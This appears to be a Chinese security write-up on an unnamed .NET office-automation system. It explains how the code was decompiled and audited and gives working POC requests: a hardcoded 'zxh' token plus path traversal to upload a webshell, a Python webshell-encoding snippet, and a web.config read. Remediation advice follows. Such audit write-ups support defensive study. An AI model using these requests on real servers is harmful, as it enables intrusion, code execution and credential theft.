.NET程序文件写入漏洞分析与利用指南<\/h1>

1. 漏洞概述<\/h2>

本漏洞存在于某.NET编写的OA系统中，涉及文件上传功能的安全缺陷。攻击者可以利用该漏洞实现：<\/p>

任意文件写入（包括WebShell上传）<\/li>
任意文件读取<\/li>

通过路径穿越实现目录跳转<\/li> <\/ol>

2. 环境准备与分析工具<\/h2>

2.1 反编译工具<\/h3>

.NET程序分析推荐使用以下工具：<\/p>

ILSpy<\/strong>：持续维护更新的.NET反编译工具<\/li>

dnSpy<\/strong>：虽然官方在2020年归档，但仍有爱好者维护的非官方版本（GitHub搜索"dnSpy fork:only"）<\/li> <\/ul>
2.2 .NET程序结构特点<\/h3>

预编译的ASP.NET Web应用程序通常将程序集（DLL）放在bin<\/code>目录下<\/li>
类似于Java的WEB-INF\/lib<\/code>存放JAR文件<\/li>
.NET的DLL与Java的JAR都是代码打包分发格式<\/li> <\/ul> 3. 路由分析<\/h2> 3.1 全局应用程序类<\/h3> 分析起点为Global.asax<\/code>文件，关键点：<\/p> Inherits<\/code>属性定义了供页继承的代码隐藏类<\/li> Application_Start<\/code>方法包含应用程序启动时运行的代码<\/li> <\/ul> 3.2 Web API路由配置<\/h3> 通过WebApiConfig.Register<\/code>方法定义API路由：<\/p> 控制器是处理HTTP请求的类<\/li> 控制器的公共方法称为操作方法(action)<\/li> 框架收到请求后路由到对应action<\/li> <\/ul> 4. 漏洞详细分析<\/h2> 4.1 文件上传漏洞(UploadFile)<\/h3> 4.1.1 漏洞端点<\/h4> POST \/api\/files\/UploadFile <\/code><\/pre> 4.1.2 请求参数<\/h4> 参数名<\/th> 类型<\/th> 描述<\/th> <\/tr> <\/thead> token<\/td> string<\/td> 认证令牌<\/td> <\/tr> FileName<\/td> string<\/td> 目标文件名（含路径）<\/td> <\/tr> pathType<\/td> int<\/td> 路径类型标识<\/td> <\/tr> fs<\/td> byte[]<\/td> 文件内容（JSON格式的字节数组）<\/td> <\/tr> <\/tbody> <\/table> 4.1.3 认证绕过<\/h4> 使用硬编码令牌zxh<\/code>即可通过认证<\/li> 认证检查代码：return new UserInfo();<\/code><\/li> <\/ul> 4.1.4 文件写入过程<\/h4> fs<\/code>参数通过JsonConvert.DeserializeObject<byte[]><\/code>反序列化为字节数组<\/li> 通过SingleBase<fileServices>.Instance.UploadFile<\/code>写入文件<\/li> 使用memoryStream.WriteTo(fileStream)<\/code>实现文件写入<\/li> <\/ol> 4.1.5 路径控制<\/h4> 通过pathType<\/code>参数决定基础路径<\/li> FileName<\/code>参数可包含路径穿越符（如\/..\/..\/<\/code>）<\/li> 可跳转到web目录（如\/..\/..\/manager\/a.aspx<\/code>）<\/li> <\/ul> 4.1.6 利用POC<\/h4> POST<\/span> \/api\/files\/UploadFile HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> your-ip<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 1926<\/span> <\/span><\/span> <\/span><\/span>token=zxh&FileName=\/..\/..\/manager\/a.aspx&pathType=1&fs=[60,37,64,...] <\/span><\/span><\/code><\/pre>4.1.7 WebShell生成<\/h4> 使用Python生成WebShell字节数组：<\/p> webshell =<\/span> '<%now()%>'<\/span> <\/span><\/span>print(str([ord(x) for<\/span> x in<\/span> webshell]).<\/span>replace(' '<\/span>, ''<\/span>)) <\/span><\/span><\/code><\/pre>4.2 其他文件上传变种<\/h3> 4.2.1 UploadFile2<\/h4> 额外参数：startPoint<\/code>和dataSize<\/code><\/li> 当startPoint=0<\/code>时直接写入文件<\/li> 当startPoint≠0<\/code>时要求：目标文件已存在<\/li> startPoint<\/code>值必须等于文件当前长度<\/li> dataSize<\/code>必须等于写入内容的字符数<\/li> <\/ul> <\/li> 使用append<\/code>模式追加写入<\/li> <\/ul> 4.2.2 UploadBillFile2<\/h4> 原理与UploadFile2相同<\/li> 仅上传路径不同<\/li> 仍可通过文件名进行目录穿越<\/li> <\/ul> 4.2.3 临时目录上传<\/h4> 使用Path.GetTempPath()<\/code>获取路径<\/li> 只能上传到%TMP%<\/code>目录<\/li> 仍可尝试路径穿越到启动目录<\/li> <\/ul> 4.3 任意文件读取漏洞<\/h3> 4.3.1 漏洞端点<\/h4> POST \/api\/files\/DownloadFile <\/code><\/pre> 4.3.2 请求参数<\/h4> 参数名<\/th> 类型<\/th> 描述<\/th> <\/tr> <\/thead> token<\/td> string<\/td> 认证令牌（硬编码zxh<\/code>）<\/td> <\/tr> requestFileName<\/td> string<\/td> 要读取的文件路径<\/td> <\/tr> pathType<\/td> int<\/td> 路径类型标识<\/td> <\/tr> <\/tbody> <\/table> 4.3.3 利用POC<\/h4> POST<\/span> \/api\/files\/DownloadFile HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> your-ip<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>token=zxh&requestFileName=..\/..\/manager\/web.config&pathType=1 <\/span><\/span><\/code><\/pre>5. 漏洞修复建议<\/h2> 认证机制<\/strong>：<\/p> 移除硬编码令牌<\/li> 实现完善的认证和授权机制<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 对文件名进行严格过滤，禁止路径穿越符<\/li> 限制文件扩展名<\/li> <\/ul> <\/li> 路径安全<\/strong>：<\/p> 使用Path.GetFullPath<\/code>规范化路径<\/li> 限制文件操作在指定目录内<\/li> <\/ul> <\/li> 文件操作<\/strong>：<\/p> 对上传内容进行安全检查<\/li> 设置文件权限限制<\/li> <\/ul> <\/li> 日志监控<\/strong>：<\/p> 记录所有文件操作<\/li> 监控异常文件访问模式<\/li> <\/ul> <\/li> <\/ol> 6. 总结<\/h2> 该漏洞展示了.NET应用程序中常见的几类安全问题：<\/p> 硬编码凭据<\/li> 缺乏输入验证导致的路径穿越<\/li> 不安全的文件操作<\/li> 功能相似的多个端点存在相同漏洞<\/li> <\/ol> 通过此案例，安全研究人员可以学习到.NET应用程序审计的基本方法和常见漏洞模式。<\/p>